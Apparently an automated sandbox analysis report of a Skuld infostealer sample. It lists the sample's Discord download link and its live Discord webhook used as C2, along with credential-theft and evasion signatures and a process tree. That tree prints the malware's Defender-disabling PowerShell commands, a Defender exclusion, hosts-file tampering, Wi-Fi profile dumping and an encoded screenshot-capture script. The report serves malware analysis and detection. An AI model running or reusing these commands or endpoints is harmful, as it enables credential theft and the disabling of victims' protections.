Analysis

  • max time kernel
    780s
  • max time network
    727s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-09-2024 22:10

General

  • Target

    https://cdn.discordapp.com/attachments/1279538248812728444/1279554286606356606/protected.exe?ex=66de17ca&is=66dcc64a&hm=43250b2cd503619bdfc07222d9499ec7477897d59a519ea19ce0c71f0ab6bf0a&

Malware Config

Extracted

Family

skuld

C2

https://discord.com/api/webhooks/1279552508578238534/-lGdkw-tDuy6Wd-I7APMhPnY3Tp2Oh3ZxzkvZFiG36eu6-pHpBKf4a2y4W0ZpaNYzcmk

Signatures

  • Skuld stealer

    An info stealer written in Go lang.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies system certificate store 2 TTPs 9 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1279538248812728444/1279554286606356606/protected.exe?ex=66de17ca&is=66dcc64a&hm=43250b2cd503619bdfc07222d9499ec7477897d59a519ea19ce0c71f0ab6bf0a&
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4436
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff88fe46f8,0x7fff88fe4708,0x7fff88fe4718
      2⤵
        PID:1920
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
        2⤵
          PID:3976
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4440
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2532 /prefetch:8
          2⤵
            PID:4220
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
            2⤵
              PID:2496
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
              2⤵
                PID:1836
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 /prefetch:8
                2⤵
                  PID:4152
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1272
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
                  2⤵
                    PID:3132
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1
                    2⤵
                      PID:1572
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5032 /prefetch:8
                      2⤵
                        PID:2652
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                        2⤵
                          PID:4424
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6156 /prefetch:8
                          2⤵
                            PID:5108
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1
                            2⤵
                              PID:3944
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6372 /prefetch:1
                              2⤵
                                PID:3100
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5464 /prefetch:8
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3368
                              • C:\Users\Admin\Downloads\_protected.exe
                                "C:\Users\Admin\Downloads\_protected.exe"
                                2⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Drops file in Drivers directory
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Checks whether UAC is enabled
                                • Maps connected drives based on registry
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Modifies system certificate store
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1568
                                • C:\Windows\system32\attrib.exe
                                  attrib +h +s C:\Users\Admin\Downloads\_protected.exe
                                  3⤵
                                  • Views/modifies file attributes
                                  PID:5244
                                • C:\Windows\system32\attrib.exe
                                  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                  3⤵
                                  • Views/modifies file attributes
                                  PID:5272
                                • C:\Windows\System32\Wbem\wmic.exe
                                  wmic csproduct get UUID
                                  3⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5296
                                • C:\Windows\System32\Wbem\wmic.exe
                                  wmic path win32_VideoController get name
                                  3⤵
                                  • Detects videocard installed
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5332
                                • C:\Windows\System32\Wbem\wmic.exe
                                  wmic os get Caption
                                  3⤵
                                    PID:5388
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\Downloads\_protected.exe
                                    3⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:5444
                                  • C:\Windows\System32\Wbem\wmic.exe
                                    wmic cpu get Name
                                    3⤵
                                      PID:5556
                                    • C:\Windows\System32\Wbem\wmic.exe
                                      wmic path win32_VideoController get name
                                      3⤵
                                      • Detects videocard installed
                                      PID:5612
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                      3⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:5668
                                    • C:\Windows\System32\Wbem\wmic.exe
                                      wmic csproduct get UUID
                                      3⤵
                                        PID:5780
                                      • C:\Windows\system32\attrib.exe
                                        attrib -r C:\Windows\System32\drivers\etc\hosts
                                        3⤵
                                        • Drops file in Drivers directory
                                        • Views/modifies file attributes
                                        PID:5848
                                      • C:\Windows\system32\netsh.exe
                                        netsh wlan show profiles
                                        3⤵
                                        • Event Triggered Execution: Netsh Helper DLL
                                        • System Network Configuration Discovery: Wi-Fi Discovery
                                        PID:5864
                                      • C:\Windows\system32\attrib.exe
                                        attrib +r C:\Windows\System32\drivers\etc\hosts
                                        3⤵
                                        • Drops file in Drivers directory
                                        • Views/modifies file attributes
                                        PID:5888
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                        3⤵
                                          PID:5928
                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hirbzoa4\hirbzoa4.cmdline"
                                            4⤵
                                              PID:6104
                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES658B.tmp" "c:\Users\Admin\AppData\Local\Temp\hirbzoa4\CSCAB7601C5E106462BA9A62828D1A2B80.TMP"
                                                5⤵
                                                  PID:6140
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2284 /prefetch:2
                                            2⤵
                                              PID:5568
                                          • C:\Windows\System32\CompPkgSrv.exe
                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                            1⤵
                                              PID:4852
                                            • C:\Windows\System32\CompPkgSrv.exe
                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                              1⤵
                                                PID:1700

                                              Network

                                              MITRE ATT&CK Enterprise v15

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                Filesize

                                                2KB

                                                MD5

                                                d85ba6ff808d9e5444a4b369f5bc2730

                                                SHA1

                                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                                SHA256

                                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                SHA512

                                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                Filesize

                                                152B

                                                MD5

                                                9b008261dda31857d68792b46af6dd6d

                                                SHA1

                                                e82dc88e2d1da2df7cb19d79a0346b9bb90d52b3

                                                SHA256

                                                9ac598d4f8170f7e475d84103aead9e3c23d5f2d292741a7f56a17bde8b6f7da

                                                SHA512

                                                78853091403a06beeec4998e2e3a4342111895ffd485f7f7cd367741a4883f7a25864cba00a6c86f27dc0c9ce9d04f08011ecc40c8ae9383d33274739ac39f10

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                Filesize

                                                152B

                                                MD5

                                                0446fcdd21b016db1f468971fb82a488

                                                SHA1

                                                726b91562bb75f80981f381e3c69d7d832c87c9d

                                                SHA256

                                                62c5dc18b25e758f3508582a7c58bb46b734a774d97fc0e8a20614235caa8222

                                                SHA512

                                                1df7c085042266959f1fe0aedc5f6d40ceba485b54159f51f0c38f17bb250b79ea941b735e1b6faf219f23fe8ab65ac4557f545519d52d5416b89ad0f9047a31

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                Filesize

                                                124KB

                                                MD5

                                                b2ddbb83c6ac6400520dda8c884f4b19

                                                SHA1

                                                83181a36e32c4de7ae30e9ac52f2d6bd98cc9cb1

                                                SHA256

                                                575f31c38adb83f6021ca7379236c5c1410698f2f9690a1eb1a883ed56558d28

                                                SHA512

                                                538af7413a0b3512a9fb653981f62442782da1395f02a8f4e3a3c60825c9a3f721939613af6b35ebe4556da741b137e307aa31a34569ae09445ccda567a8eef2

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                Filesize

                                                186B

                                                MD5

                                                094ab275342c45551894b7940ae9ad0d

                                                SHA1

                                                2e7ce26fe2eb9be641ae929d0c9cc0dfa26c018e

                                                SHA256

                                                ef1739b833a1048ee1bd55dcbac5b1397396faca1ad771f4d6c2fe58899495a3

                                                SHA512

                                                19d0c688dc1121569247111e45de732b2ab86c71aecdde34b157cfd1b25c53473ed3ade49a97f8cb2ddc4711be78fa26c9330887094e031e9a71bb5c29080b0d

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                Filesize

                                                5KB

                                                MD5

                                                404d3a721493d031d8210e065d926871

                                                SHA1

                                                9749babbd1a48657b5031378e2eeee139c7851d7

                                                SHA256

                                                8436eed8b44644d3069c1488232958acc9b60d643dbea6ead9dd8adc5ccebe90

                                                SHA512

                                                8cc76f3dfb9bb3104951cc44bab6e89807cd467adb7538cf31acba7990952e549da32dfca38296befea5458f186941d0604ad17ccbe42b133d5d09545bb17644

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                Filesize

                                                6KB

                                                MD5

                                                ccd1579fe427ce0ae46c165547cf7cd9

                                                SHA1

                                                a08d5514e9b95afc6d58963852b2ce14a4ffae0d

                                                SHA256

                                                f0d019306c48744837ca7606bc6c20fd3d79b4e5fc6863225d75e64c69d8f143

                                                SHA512

                                                b53b2915a01f61eb94b8665ffa87bd2686ca00c21a3209ed307e4b360f3a69a2f3b035966ba31de28fd03c37e1ff396b758022d01996aad26e1ec3a6a3f329a9

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                Filesize

                                                6KB

                                                MD5

                                                9aebe703db17f2550ac09af72a7cf2c7

                                                SHA1

                                                b805da2a04498aa6c6d03df98260d07387108028

                                                SHA256

                                                51e1096c9cdeba79d5efbe5776f6da782ddf80b34a8585918e9a5ece244f4aba

                                                SHA512

                                                09e8e82b13c07246fdae98e4fcebec5e9ce7ce0e5ec6bb13ca60d009422d7ffce73f6622262dbec126e02d13150c30e5a66feda7485e7755ecfc419af63d4ac3

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                Filesize

                                                16B

                                                MD5

                                                6752a1d65b201c13b62ea44016eb221f

                                                SHA1

                                                58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                SHA256

                                                0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                SHA512

                                                9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                Filesize

                                                10KB

                                                MD5

                                                5e18458217130b145b341b3629ee9134

                                                SHA1

                                                9e87cc7b2c8a2fc0ba6cbb664065fd66e72d257b

                                                SHA256

                                                00d9852e2999a19ae729d3a3b19bf836b69bc37a4a0e6c65ed336d568e216bd5

                                                SHA512

                                                f4539235a52543f98507e62aa68c031c3b527f876694a5730d3167f85b73a541974dbb15f1a858884e546fbe21f8a002217cc55c546348cf79c7129121e192b9

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                Filesize

                                                10KB

                                                MD5

                                                4621697f3de91b112c41c4fa506680b8

                                                SHA1

                                                faf0f0551e8e2fde4d1d68a4c4835e50feac7704

                                                SHA256

                                                861599487197dafe0924b192ed517c6e5d3991ebffa3adffba643cf3655e2f68

                                                SHA512

                                                7872b1c80cf5d9b9c9fa4a18204fce0a800863e9b52708d20829b1f16f9b629cb560cb1f49634090ed59e245972b082d1cda5cc974db0549e742ff3eebc50d03

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize
